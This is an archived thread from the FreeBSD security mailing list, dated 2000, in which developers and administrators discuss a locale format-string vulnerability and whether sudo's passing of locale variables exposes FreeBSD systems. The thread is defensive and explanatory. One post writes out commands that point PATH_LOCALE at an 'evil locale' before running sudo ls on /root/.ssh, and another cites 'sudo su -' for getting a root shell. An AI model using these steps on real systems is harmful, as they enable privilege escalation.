(CEST) (envelope-from pherman@frenchfries.net) Date: Thu, 7 Sep 2000 11:22:10 +0200 (CEST) From: Paul Herman To: Neil Blakey-Milner Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <20000907104925.A37872@mithrandr.moria.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Neil Blakey-Milner wrote: > On Thu 2000-09-07 (10:12), Vladimir Mencl, MK, susSED wrote: > > > > However, I think that FreeBSD is vulnerable with the sudo port > > installed. > > > > Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH) > > it does pass the LC_ALL, PATH_LOCALE variables through. > > Why would someone install the sudo RedHat package on FreeBSD? :) I think he meant the FreeBSD sudo port, which in turn *may* sudo a Linux binary. (yes, I know, not so likely, but...) However, this thread only talked about vulnerable Linux programs under emulation. There were indeed two advisories this last weekend, the glibc advisory (linux only) and the locale advisory, which AFAIK affects other platforms (Solaris is affected, for example.) I've been following freebsd-security, but I haven't seen any confirmation one way or the other (except for linux binaries mentioned in this thread.) Kris, is FreeBSD itself vulnerable to the locale vuln.? -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 2:34:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 799CB37B422 for ; Thu, 7 Sep 2000 02:34:25 -0700 (PDT) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13Wy4a-000A0s-00; Thu, 07 Sep 2000 11:34:20 +0200 Date: Thu, 7 Sep 2000 11:34:20 +0200 From: Neil Blakey-Milner To: "Vladimir Mencl, MK, susSED" Cc: freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000907113419.A38101@mithrandr.moria.org> References: <20000907104925.A37872@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from mencl@nenya.ms.mff.cuni.cz on Thu, Sep 07, 2000 at 10:56:59AM +0200 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu 2000-09-07 (10:56), Vladimir Mencl, MK, susSED wrote: > > Why would someone install the sudo RedHat package on FreeBSD? > > sudo is a FreeBSD port, and is distributed in the set of precompiled > packages, for quite a long time, and is of course included in the package > set of the 4.1 release - sudo-1.6.3.4.tgz > > And sudo is a nice tool for delegating certain priviliges to users, > that's why I installed it. It's surely more secure, than telling > everybody the root password - although you have to be careful not to > create a security hole. I understand sudo is a FreeBSD package. However, it's insecurity has nothing to do with the glibc locale bug, so it should be investigated in its own context. I imagine bringing it to the attention of the sudo developers would be a good idea. I'd be surprised if they didn't fix it once aware of it. (I don't use sudo. Custom setuid scripts with rcs-aware editors running as user are usually much better.) Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 2:47:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from columbus.cris.net (columbus.cris.net [212.110.128.65]) by hub.freebsd.org (Postfix) with ESMTP id 15FCB37B423 for ; Thu, 7 Sep 2000 02:47:27 -0700 (PDT) Received: from ark.cris.net (ark.cris.net [212.110.128.68]) by columbus.cris.net (8.9.3/8.9.3) with ESMTP id MAA73102; Thu, 7 Sep 2000 12:47:08 +0300 (EEST) Received: (from phantom@localhost) by ark.cris.net (8.9.3/8.9.3) id MAA31262; Thu, 7 Sep 2000 12:46:52 +0300 (EEST) (envelope-from phantom) Date: Thu, 7 Sep 2000 12:46:52 +0300 From: Alexey Zelkin To: Paul Herman Cc: security@freeBSD.org Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000907124652.A30896@ark.cris.net> References: <20000907104925.A37872@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from pherman@frenchfries.net on Thu, Sep 07, 2000 at 11:22:10AM +0200 X-Operating-System: FreeBSD 3.5-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, On Thu, Sep 07, 2000 at 11:22:10AM +0200, Paul Herman wrote: > I've been following freebsd-security, but I haven't seen any > confirmation one way or the other (except for linux binaries mentioned > in this thread.) Kris, is FreeBSD itself vulnerable to the locale > vuln.? Please read original post more carefully. It contains an answer (BTW, exactly from Kris) -- /* Alexey Zelkin && phantom@cris.net */ /* Tavric National University && phantom@FreeBSD.org */ /* Sysadmin/Developer && phantom@sms.umc.com.ua */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 2:53:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 827BE37B423; Thu, 7 Sep 2000 02:53:52 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id CAA91350; Thu, 7 Sep 2000 02:53:52 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 02:53:51 -0700 (PDT) From: Kris Kennaway To: Paul Herman Cc: Neil Blakey-Milner , freebsd-security@FreeBSD.ORG, security-officer@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Paul Herman wrote: > However, this thread only talked about vulnerable Linux programs under > emulation. There were indeed two advisories this last weekend, the > glibc advisory (linux only) and the locale advisory, which AFAIK > affects other platforms (Solaris is affected, for example.) > > I've been following freebsd-security, but I haven't seen any > confirmation one way or the other (except for linux binaries mentioned > in this thread.) Kris, is FreeBSD itself vulnerable to the locale > vuln.? Short answer: sort of, but only in certain third party applications (I don't know of any at the moment). The FreeBSD base system is not believed to be vulnerable. Back on 05 Aug I committed a fix to -current for an exploitable buffer overflow in catopen(). This was merged to 4.1-STABLE on 22 August, because I got distracted and forgot about it :-( I'm still trying to get time to write an advisory. A few weeks later, we were contacted by Ivan Arce of core-sdi about multi-vendor problems with locale functions - we weren't vulnerable to any of these mentioned. During their testing, the glibc guys discovered a further problem wherein a setuid app could be told to look at a user-supplied file for catalog data, which could then be used to execute arbitrary code if the application is badly written and does not make use of the data correctly (this is a typical "missing format string" vulnerability). That one was fixed in -current on September 1, but that has not yet been merged. I only realised this vulnerability yesterday - I'll get it merged ASAP. HOWEVER: no program shipped in the FreeBSD base system is believed to be vulnerable to either of these problems. They both affect catopen(), and we don't use that function at all except in tcsh, which is non-privileged. We don't even have any code which has the required bug needed to exploit the second problem (assuming the first condition were true) - I did a big sweep a month or two back for all such instances of incorrect format string handling, and there were none in privileged programs (and few such real bugs in other programs). I don't know of any ports which install setugid binaries and use catopen(). If they do, they are vulnerable. If not, you have nothing to worry about. I'm going to try and get the advisory out this week which will include a scanning utility to check vulnerability of ports. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 3:41:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D3C6B37B422; Thu, 7 Sep 2000 03:41:13 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id DAA02056; Thu, 7 Sep 2000 03:41:13 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 03:41:13 -0700 (PDT) From: Kris Kennaway To: "Vladimir Mencl, MK, susSED" Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Vladimir Mencl, MK, susSED wrote: > However, I think that FreeBSD is vulnerable with the sudo port > installed. > > Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH) > it does pass the LC_ALL, PATH_LOCALE variables through. > > Therefore, I belive, that any user allowed to use sudo to execute a > program with elevated privileges, can potentially exploit this > vulnerability. > > So, at least a port security advisory should be issued, and possibly the > sudo port patched to discard locale-specific environment variables. Thanks for the report. I'll look into it and issue a ports advisory if necessary (this seems to be a sudo problem, not a FreeBSD one - PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too, although I need to check that properly) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 3:46:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 558D137B423; Thu, 7 Sep 2000 03:46:36 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id DAA02738; Thu, 7 Sep 2000 03:46:36 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 03:46:35 -0700 (PDT) From: Kris Kennaway To: "Vladimir Mencl, MK, susSED" Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Kris Kennaway wrote: > Thanks for the report. I'll look into it and issue a ports advisory if > necessary (this seems to be a sudo problem, not a FreeBSD one - > PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too, > although I need to check that properly) Which is to say, there could possibly be problems with certain vulnerable *non*-setugid apps launched by sudo, i.e. the user could execute other arbitrary commands as whatever user they are sudo'ing to. But I need to check whether this is in fact the case. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 4: 0:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 9C02737B423; Thu, 7 Sep 2000 04:00:11 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id NAA26236; Thu, 7 Sep 2000 13:00:10 +0200 (MET DST) Date: Thu, 7 Sep 2000 13:00:10 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: Kris Kennaway Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Kris Kennaway wrote: > On Thu, 7 Sep 2000, Kris Kennaway wrote: > > > Thanks for the report. I'll look into it and issue a ports advisory if > > necessary (this seems to be a sudo problem, not a FreeBSD one - > > PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too, > > although I need to check that properly) > > Which is to say, there could possibly be problems with certain vulnerable > *non*-setugid apps launched by sudo, i.e. the user could execute other > arbitrary commands as whatever user they are sudo'ing to. But I need to > check whether this is in fact the case. I did make some tests before posting my initial message. I allowed a user to run '/bin/ls -l /' as root - a simple test. /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a localized date/time formatting) even when invoked via sudo. That would be sufficient to use the vulnerability, I suppose. In my opinion, the cause of the vulnerability is in the conjunction of two conditions - 1. the "general misconception of locales", allowing user to tweak the behavior of programs via locales, which has been solved in FreeBSD, and 2. sudo not taking into account the fact, that FreeBSD has decided to propagate custom locales to programs running with upgraded privileges. Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 7:54:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 8B0A937B424 for ; Thu, 7 Sep 2000 07:54:44 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id QAA29101; Thu, 7 Sep 2000 16:54:41 +0200 (MET DST) Date: Thu, 7 Sep 2000 16:54:41 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: mike.sellenschuetter@bankofamerica.com Cc: security@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <86256953.004E2938.00@dalnsd40.bankofamerica.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000 mike.sellenschuetter@bankofamerica.com wrote: > Hi, > > I am a learning FreeBSD systems administrator so my knowledge level of Unix is > not at your level. However, I have installed Sudo on the system that I > maintain, and I don't fully understand your concern. I agree that Sudo is a > nice tool. And although one can configure Sudo to prevent users assigned to a > particular Sudo group from executing certain commands, it is my understanding > that when a user executes a command with Sudo, his or her real and effective UID > and GID becomes zero or root for that command. This behavior alone creates many > concerns because a user can exploit this to gain root access. > > Within the sudoers file, I prevent a user from spawning another shell with Sudo; > however, I can not monitor everyone's home directory for programs that when > executed with Sudo will spawn another shell as root. While that shell is > active, this user owns my system, and I have to assume a certain level of trust > with the users that I have given Sudo privileges. It seems to me with my > limited knowledge that the below concern is minimal compared to the other > avenues available to users who have Sudo privileges. > > Am I missing something? This is probably the case so can you help me to > understand your concern? In a situation like this (when you give "nearly-the-root-shell" to the users), and your relation with the users is based on trust, this issue is not to be concerned. What I was concerned about is, when only some very limited commands are accessible via sudo, that these commands might be used to exploit the locale vulnerability. I'm myself using sudo only to run the "/sbin/mount /cdrom" command (and umount). The mount and umount commands do not use any locales, seems to me, however other commands might. As an example, I used the /bin/ls command - imagine, that I wish to allow some users to list an inaccessible directory, and I decide to use sudo for this operation. If I add the "ALL ALL = NOPASSWD: /bin/ls -l /root/.ssh" line to the sudoers file (just to allow anybody to check the root's .ssh directory - a silly example, but I cannot find out any better now), /bin/ls can be exploited. If a malicious user types export PATH_LOCALE=/tmp/my_evil_locales/ export LC_ALL=en_evil_locale sudo /bin/ls -l /root/.ssh this user might possibly cause ls to execute code forged in the evil locale. The point is, that this would not work for setuid binaries on FreeBSD, because setuid binaries ignore the locale settings on FreeBSD. However, the authors of the sudo program were not aware of the dangeour the locale environment variables present, and are passing these settings to the programs executed. The settings should be blocked the same way LD_* variables are blocked. LD_* variables are ignored by a setuid program, because this program is aware of its setuid-ness. However, sudo, which masks the setuidness, has to protect the programs from these variables, and should do the same for locale setting environment variables. Can anybody comment, whether there are any other environment variables harmful to setuid programs (and ignored by them), which should be blocked by sudo too, besides the LD_* and LC_* ? And what's the status of other sudo-like ports - the su2 and super ? Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 9: 4:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from jake.akitanet.co.uk (jake.akitanet.co.uk [212.1.130.131]) by hub.freebsd.org (Postfix) with ESMTP id E935437B422 for ; Thu, 7 Sep 2000 09:04:31 -0700 (PDT) Received: from ppp-10a-93.3com.telinco.net ([212.159.146.93] helo=foo.akitanet.co.uk) by jake.akitanet.co.uk with smtp (Exim 3.13 #3) id 13X49Q-000Fgq-00; Thu, 07 Sep 2000 17:03:44 +0100 From: Paul Robinson Organization: Akita Ltd. To: "Vladimir Mencl, MK, susSED" , mike.sellenschuetter@bankofamerica.com Subject: Re: UNIX locale format string vulnerability (fwd) Date: Thu, 7 Sep 2000 17:01:54 +0100 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain; charset="US-ASCII" Cc: security@freebsd.org References: In-Reply-To: MIME-Version: 1.0 Message-Id: <00090717035304.31820@foo.akitanet.co.uk> Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 07 Sep 2000, Vladimir Mencl, MK, susSED wrote: =20 > What I was concerned about is, when only some very limited commands are > accessible via sudo, that these commands might be used to exploit the > locale vulnerability. Although a valid point, I'm amazed that on 99.95% of machines with sudo installed I can walk upto it and type: sudo su - And get root shell straight away.sudo /bin/sh is always a good one as wel= l. I think the education needs to start at the basic level first,because I've = yet to see anybody setup sudo correctly the first time around. =20 --=20 Paul Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 9:16:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 7806437B423 for ; Thu, 7 Sep 2000 09:16:06 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e87GG6320742 for ; Thu, 7 Sep 2000 09:16:06 -0700 (PDT) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma020740; Thu, 7 Sep 2000 09:15:50 -0700 Received: (from dhw@localhost) by pau-amma.whistle.com (8.9.3/8.9.3) id JAA06923 for security@FreeBSD.ORG; Thu, 7 Sep 2000 09:15:50 -0700 (PDT) (envelope-from dhw) Date: Thu, 7 Sep 2000 09:15:50 -0700 (PDT) From: David Wolfskill Message-Id: <200009071615.JAA06923@pau-amma.whistle.com> Subject: Re: UNIX locale format string vulnerability (fwd) Cc: security@FreeBSD.ORG In-Reply-To: <00090717035304.31820@foo.akitanet.co.uk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >From: Paul Robinson >To: "Vladimir Mencl, MK, susSED" , >Date: Thu, 7 Sep 2000 17:01:54 +0100 >Although a valid point, I'm amazed that on 99.95% of machines with sudo >installed I can walk upto it and type: >sudo su - >And get root shell straight away.sudo /bin/sh is always a good one as well. I >think the education needs to start at the basic level first,because I've yet to >see anybody setup sudo correctly the first time around. With respect, what you observe may well be "correctly" for some of the installations in question. "What is correct" is a highly context- sensitive matter, and trying to apply the criteria for one set of circumstances to an installation that is in a different set of circumstances is not always useful. This is not to say that folks do not make mistakes; we're all human. But in practice, there are trade-offs made in implementing security. Cheers, david -- David Wolfskill dhw@whistle.com UNIX System Administrator Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 9:18: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E6C6337B422; Thu, 7 Sep 2000 09:18:04 -0700 (PDT) Received: from billy-club.village.org (billy-club.village.org [10.0.0.3]) by rover.village.org (8.9.3/8.9.3) with ESMTP id KAA37265; Thu, 7 Sep 2000 10:17:57 -0600 (MDT) (envelope-from imp@billy-club.village.org) Received: from billy-club.village.org (localhost [127.0.0.1]) by billy-club.village.org (8.11.0/8.8.3) with ESMTP id e87GIOG16223; Thu, 7 Sep 2000 10:18:24 -0600 (MDT) Message-Id: <200009071618.e87GIOG16223@billy-club.village.org> To: "Vladimir Mencl, MK, susSED" Subject: Re: UNIX locale format string vulnerability (fwd) Cc: Kris Kennaway , Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 13:00:10 +0200." References: Date: Thu, 07 Sep 2000 10:18:24 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "Vladimir Mencl, MK, susSED" writes: : I allowed a user to run '/bin/ls -l /' as root - a simple test. : : /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a : localized date/time formatting) even when invoked via : sudo. That would be sufficient to use the vulnerability, I suppose. Did it allow you to read a file in PATH_LOCALE that otherwise it wouldn't have? Are there buffer overflows that this could exploit? Are there infomation leaks that you could force with this? What, specifically, is the problem here? : In my opinion, the cause of the vulnerability is in the conjunction of : two conditions - : : 1. the "general misconception of locales", allowing user to tweak the : behavior of programs via locales, which has been solved in FreeBSD, and : 2. sudo not taking into account the fact, that FreeBSD has decided to : propagate custom locales to programs running with upgraded privileges. sudo was designed to be fairly permissive in many ways. The authors of sudo explicitly realized that there maybe loopholes in the command set that you give users and that you must trust honest users to stay honest with it. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 13:48:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 6EC3B37B423 for ; Thu, 7 Sep 2000 13:48:23 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id WAA00866; Thu, 7 Sep 2000 22:48:08 +0200 (MET DST) Date: Thu, 7 Sep 2000 22:48:08 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009071618.e87GIOG16223@billy-club.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message "Vladimir Mencl, MK, susSED" writes: > : I allowed a user to run '/bin/ls -l /' as root - a simple test. > : > : /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a > : localized date/time formatting) even when invoked via > : sudo. That would be sufficient to use the vulnerability, I suppose. > > Did it allow you to read a file in PATH_LOCALE that otherwise it > wouldn't have? Are there buffer overflows that this could exploit? > Are there infomation leaks that you could force with this? What, > specifically, is the problem here? I have not tried reading a file I would not have permision, that is not something I could use the locales for - unless the file was in the format used by locales. I do not think that this mechanism could be used for arbitrary files. The point is, that if I submitted an evil locale - especially, a locale containing formatting strings with "%n"s, and generally with a lot of weird formatting characters, I could potentially make that sudo-run program execute arbitrary code provided by me - that's what the original bugtraq advisory was about, and what I claim that with sudo can be exploited on FreeBSD too. However, the vulnerability is not a buffer overflow, it's only a not-properly-checked format string, and creating an exploit only using "%n"s would be a really ugly hard work, and I would be trying to avoid doing it at any cost.... Best regards and good night Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14: 0:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A9AF337B423 for ; Thu, 7 Sep 2000 14:00:12 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA38874; Thu, 7 Sep 2000 15:00:05 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA05785; Thu, 7 Sep 2000 14:59:55 -0600 (MDT) Message-Id: <200009072059.OAA05785@harmony.village.org> To: "Vladimir Mencl, MK, susSED" Subject: Re: UNIX locale format string vulnerability (fwd) Cc: freebsd-security@FreeBSD.ORG, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 22:48:08 +0200." References: Date: Thu, 07 Sep 2000 14:59:55 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "Vladimir Mencl, MK, susSED" writes: : The point is, that if I submitted an evil locale - especially, a locale : containing formatting strings with "%n"s, and generally with a lot of : weird formatting characters, I could potentially make that sudo-run : program execute arbitrary code provided by me - that's what the original : bugtraq advisory was about, and what I claim that with sudo can be : exploited on FreeBSD too. Ah. I see your point. This is a generic problem then. However, it is a problem with sudo (which is why I keep adding millert back to the list of CC'd people). It likely isn't a big problem for reasons I explained earlier. sudo isn't inteded to be a bulletproof way to give users the ability to execute N listed commands, as many of those may have sub commands. Todd can take a stand on this more accuragely. : However, the vulnerability is not a buffer overflow, it's only a : not-properly-checked format string, and creating an exploit only using : "%n"s would be a really ugly hard work, and I would be trying to avoid : doing it at any cost.... Hmmmm. Maybe this could be done. The proper fix isn't to fix sudo, of course, but rather to ensure that sufficient arguments are present to consume the % chars and if not to not do anything. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:19: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2CE1B37B422; Thu, 7 Sep 2000 14:19:06 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA12952; Thu, 7 Sep 2000 14:19:06 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 14:19:06 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009071618.e87GIOG16223@billy-club.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message "Vladimir Mencl, MK, susSED" writes: > : I allowed a user to run '/bin/ls -l /' as root - a simple test. > : > : /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a > : localized date/time formatting) even when invoked via > : sudo. That would be sufficient to use the vulnerability, I suppose. > > Did it allow you to read a file in PATH_LOCALE that otherwise it > wouldn't have? Are there buffer overflows that this could exploit? > Are there infomation leaks that you could force with this? What, > specifically, is the problem here? If a program contains format string vulnerabilities which are used in conjunction with retrieved locale data then they can be exploited. I don't believe we have any more of these bugs in the base system as of 4.1, but some ports certainly do. It may also be possible to read bits of an arbitrary file accessible to that user which would be displayed where the localized text is used, although I don't know how much sanity checking the locale functions do of their file input (i.e. whether a malformed file will be rejected with an error message, or if it will still be interpreted somehow and spat out) Again, the problem here is with sudo, not with something that comes in FreeBSD. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 14:27:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 97E3B37B422; Thu, 7 Sep 2000 14:27:11 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LQuE12710; Thu, 7 Sep 2000 15:26:57 -0600 (MDT) Message-Id: <200009072126.e87LQuE12710@xerxes.courtesan.com> To: Kris Kennaway Cc: Warner Losh , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Thu, 07 Sep 2000 14:19:06 PDT." References: Date: Thu, 07 Sep 2000 15:26:56 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message so spake Kris Kennaway (kris): > Again, the problem here is with sudo, not with something that comes in > FreeBSD. How is this a sudo problem? Do you expect sudo to strip away the NLS env vars for you? This would not be unprecedented, as sudo already strips out LD_* and friends but breaking locales seems a bit dodgy. As I haven't seen the entire thread I'm clearly missing some info... - todd To Unsubscribe: send mail to 